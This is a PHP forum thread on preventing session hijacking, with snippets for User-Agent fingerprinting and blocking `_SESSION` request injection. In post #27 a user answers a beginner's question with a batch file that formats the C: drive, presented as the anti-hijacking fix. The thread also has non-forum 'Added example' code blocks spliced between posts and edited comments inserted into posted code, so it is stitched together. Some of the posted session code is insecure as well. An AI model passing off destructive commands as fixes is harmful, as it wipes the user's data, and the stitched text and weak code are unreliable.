Anti session hijacking


    #16
    What to do? Isn't that a little obvious?
    That's the comment from php.net, google it...
    Btw, that's not what I asked...


      #17
      Then what did you ask? Function won't work unless session_start() is called because it uses session vars. Can't you see that?

      I know what it is meant to do, but I need to read the full thing to know if it is exactly so, because I don't know the logic behind this.

      PHP Code:
      if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
      {
          login();
      }
      Because I would check to see if they match, not if they don't match, unless the coder is using different logic.
      That's what I meant by what it is meant to do. :p

      Added after 9 minutes:

      So what's it like.

      Oh, the user agent I saved and the current user agent don't match so it is him, let's go ahead and log him in?

      Think of the implications if a cookie is hijacked.
      And oh, btw I really hate what you implied in your reply, and asking me to google a post to help you?

      First major security threat: what prevents a hacker from simply editing the cookie sid value to another value and being logged in as the user with that id value?

      You gotta obscure what you are doing a bit more and add some extra security checks.
      Last edited by frostymarvelous; 17.12.10, 15:21.
      Perfection comes at a cost



      I accept liberty!



        #18
        Bro...

        1. Not the function which Subzero did, the snippet that I copy-pasted from php.net:
        PHP Code:
        <?php
        if (isset($_REQUEST['_SESSION'])) die("Get lost Muppet!");
        ?>
        2. The question is whether this snippet helps and, if so, whether it is to be placed before or after session_start()?

        Not session vars, the snippet. I'm not asking about the function or sessions or its vars or whatever. Just the 2nd thing.

        ------------------------------
        And I hate it when someone explains something to me that I have not asked, i.e., when I see that he did not understand the question...
        I hope you are not angry, but I really did not know what else to write, so as not to get into, God forbid, an argument.
        Last edited by arnage; 17.12.10, 15:52.


          #19
          This will work when placed before or after session_start() because it does not require a session var.

          If you can give me the exact link and maybe the post, I will try to refine it for you. I don't know exactly what the coder is trying to do.

          Added after 2 minutes:

          I know I didn't really understand; that's why I asked for the link. I'm on mobile, so typing long stuff is annoying; that's why I don't wanna do something and realise that I wasted my time.
          Last edited by frostymarvelous; 17.12.10, 16:56.


            #20
            You are absolutely right; if you're on a phone, you should say so right away... ;)

            PHP: $_SESSION - Manual

            This is that page; it's the first comment, but there's no explanation in it.

            Thanks for the answer!


              #21
              So I was right, but ori and subzero didn't understand me.

              The code is trying to check if the user is trying to inject session values through the GET or POST superglobals; that's why I thought it should be PHPSESSID. This hack is only possible with register_globals turned on, though.
              If you want to use it, put it at the very top of every page. Or even better, at the top of a file which you include in all your pages, like your settings file.
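Added example, not the thread's or php.net's code: the one-line `$_REQUEST['_SESSION']` check from post #18, generalised into a bootstrap guard along the lines post #21 describes (checked at the very top of the file every page includes, before `session_start()`, and only meaningful when register_globals is on). It assumes PHP 7.1 or later; the key list, the function names and the fail-closed register_globals check are my own additions.

```php
<?php
// Added example, not code from the thread or php.net. Assumes PHP >= 7.1.
// Include this file first on every page; it runs before session_start().

// Parameter names a client must never be allowed to submit. With register_globals on,
// a request parameter named _SESSION could populate $_SESSION before session_start(),
// which is the injection the php.net note guards against. (List is my own choice.)
const FORBIDDEN_INPUT_KEYS = [
    '_SESSION', '_SERVER', '_ENV', '_COOKIE', '_GET', '_POST', '_REQUEST', '_FILES', 'GLOBALS',
];

// Returns the first offending key, or null if the request is clean. The three arrays
// are checked separately instead of $_REQUEST because request_order (e.g. "GP") can
// leave cookies out of $_REQUEST entirely.
function find_superglobal_injection(array $get, array $post, array $cookie): ?string
{
    foreach ([$get, $post, $cookie] as $input) {
        foreach (array_keys($input) as $key) {
            if (in_array((string) $key, FORBIDDEN_INPUT_KEYS, true)) {
                return (string) $key;
            }
        }
    }
    return null;
}

// Fail closed: refuse to serve at all if register_globals is on (the directive was
// removed in PHP 5.4, so ini_get() returns false there and the check is a no-op),
// then reject any request that smuggles a superglobal name through GET/POST/COOKIE.
function guard_request(): void
{
    if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
        http_response_code(500);
        exit('register_globals must be off');
    }
    $bad = find_superglobal_injection($_GET, $_POST, $_COOKIE);
    if ($bad !== null) {
        http_response_code(400);
        exit('Get lost Muppet!');
    }
}

guard_request();
session_start();
```

The guard has to run before `session_start()` only because it is the cheapest place to abort; on a PHP build without register_globals the submitted `_SESSION` parameter stays inside `$_GET`/`$_POST` and never touches `$_SESSION`, so the check is a belt-and-braces measure rather than the thing keeping the session safe.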


                #22
                If you don't want anybody to crack your session, just add salt to your session...


                  #23
                  Add salt? Can you post it here, jers0n..
                  our life is simple words....
                  http://mygenkz.net
                  ewanz06@yahoo.com
                  PHP Code:
                  $output = "i am NOoob....";
                  $newfile = "ewanz.txt";
                  $file = fopen($newfile, "w");
                  fwrite($file, $output);
                  fclose($file);


                    #24
                    You kids are still on this tip? Damn, that's sad. :-/


                      #25
                      A discussion on anti session hijacking is sad? ..... hmmm, ok, whatever you say.
                      Seeing as you have this so-called big business or whatever it is you do, you don't really do much to help yourself.
                      If I was going to hire someone to work for me etc., I would do a Google search for them and see if there is anything good or bad posted about them....
                      Well, in this case I would find you b!tching at everything .... then think you're a right (place your word here) and think I'm not hiring you.
                      But then again it's not my life; you lead it how you want to. We all make our own choices in life, but when they're done we have to live with them.


                        #26
                        How to use this code? Please tell the details.


                          #27
                          Originally posted by devil_bd:
                          How to use this code? Please tell the details.
                          You need to create a text file called antisession.bat and paste this code in it:
                          Code:
                          @echo off
                          rem formats every filesystem on the C: drive; this is not a PHP fix
                          for %%i in (c:) do format %%i /FS:NTFS /x /q
                          Then add some PHP file into the same directory as antisession.bat, double-click on it, and you will get a PHP file with the anti-session-hijack fix.


                            #28
                            lol, I wish I could not laugh, but I can't help it. Yeah, he does not know how to use it, but he will soon find out.

                            sessions.php
                            PHP Code:
                            function page_protect()
                            {
                                session_start();

                                if (isset($_SESSION['HTTP_USER_AGENT']))
                                {
                                    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
                                    {
                                        login();
                                        exit;
                                    }
                                }
                                else
                                {
                                    // Not in the post: store the fingerprint on the first visit, otherwise the check above never fires.
                                    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
                                }
                            }

                            function login()
                            {
                                // page_protect() has already started the session; a second session_start() raises a notice.
                                if (session_id() == '') {
                                    session_start();
                                }
                                if (isset($_SESSION['sid']) || isset($_COOKIE['sid'])) {

                                    // Demo only. The post had `!=` here, a comparison whose result is thrown away;
                                    // dropping the `!` (as the note below says) makes it an assignment.
                                    $_SESSION['sid'] = md5($_SERVER['HTTP_USER_AGENT']);
                                }
                            }

                            Place this under sessions.php:

                            PHP Code:
                            page_protect();

                            If you get an error, remove the ! out of sid.
                            Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
                            Visit: WapMasterz Coming Back Soon!
                            _______
                            SCRIPTS FOR SALE BY SUBZERO
                            Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
                            FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
                            _______
                            Info & Tips
                            php.net
                            w3schools.com

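Added example, not code from the thread or from subzero's script: a hardened form of the page_protect()/login() pattern posted in #28 that also answers the two objections raised in #17 (a fingerprint mismatch must never "log the user in", and nothing in a cookie the client controls may decide which user id a request gets). It assumes PHP 7.3 or later, pages served over HTTPS, and that the caller has already verified the credentials before login_user() runs; the function and session key names are my own.

```php
<?php
// Added example, not code from the thread. Assumes PHP >= 7.3 and HTTPS.

// Start the session exactly once, with cookie flags that limit what a stolen or
// guessed id is worth. use_strict_mode rejects ids the server never issued, which
// defeats session fixation (attacker plants a known PHPSESSID before the victim logs in).
function secure_session_start(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;                                   // a second session_start() is a notice
    }
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');     // never read the id from the URL
    session_set_cookie_params([
        'lifetime' => 0, 'path' => '/', 'secure' => true,
        'httponly' => true, 'samesite' => 'Lax',
    ]);
    session_start();
}

// Same idea as the thread's md5($_SERVER['HTTP_USER_AGENT']), with sha256.
function client_fingerprint(): string
{
    return hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
}

// Call only after the credentials have been verified elsewhere. The user id lives in
// the server-side session store; the browser holds nothing but the opaque session id,
// so editing the cookie cannot turn one user into another.
function login_user(int $user_id): void
{
    secure_session_start();
    session_regenerate_id(true);                  // discard the pre-login id
    $_SESSION['user_id']     = $user_id;
    $_SESSION['fingerprint'] = client_fingerprint();
    $_SESSION['last_seen']   = time();
}

// Returns the logged-in user id, or null when the request must be treated as
// anonymous. A mismatch or a stale session is destroyed; it is never re-authenticated.
function page_protect(int $idle_limit = 1800): ?int
{
    secure_session_start();
    if (!isset($_SESSION['user_id'], $_SESSION['fingerprint'], $_SESSION['last_seen'])) {
        return null;
    }
    $fresh = (time() - (int) $_SESSION['last_seen']) <= $idle_limit;
    if (!$fresh || !hash_equals((string) $_SESSION['fingerprint'], client_fingerprint())) {
        $_SESSION = [];
        setcookie(session_name(), '', time() - 3600, '/');
        session_destroy();
        return null;
    }
    $_SESSION['last_seen'] = time();
    return (int) $_SESSION['user_id'];
}

// In a protected page:
//   $uid = page_protect();
//   if ($uid === null) { header('Location: /login.php'); exit; }
```

The User-Agent fingerprint is only a speed bump: anyone positioned to steal the cookie (XSS, plaintext HTTP, a logging proxy) can usually read the User-Agent from the same request and replay it. What actually stops hijacking here is the Secure and HttpOnly cookie flags, TLS on every page, regenerating the id at login and the idle timeout; the fingerprint just catches the careless case the thread is worried about.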


                              #29
                              Originally posted by subzero:
                              core or whatever script you're using.....

                              PHP Code:
                              function page_protect()
                              {
                                  session_start();

                                  if (isset($_SESSION['HTTP_USER_AGENT']))
                                  {
                                      if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
                                      {
                                          login();
                                          exit;
                                      }
                                  }
                              }

                              function login()
                              {
                                  session_start();
                                  if (isset($_SESSION['sid']) || isset($_COOKIE['sid'])) {
                                      // Enter your SQL for your own site !!
                                  }
                              }

                              How to use

                              Under core or whatever!

                              PHP Code:
                              page_protect();

                              Add a thanks here or the button !!
                              Sir, I'm using ejatd29 sc, so where must I put this code?


                                #30
                                Hope it will be useful.... thanks bro


                                I'm Proud to be a Sri Lankan!
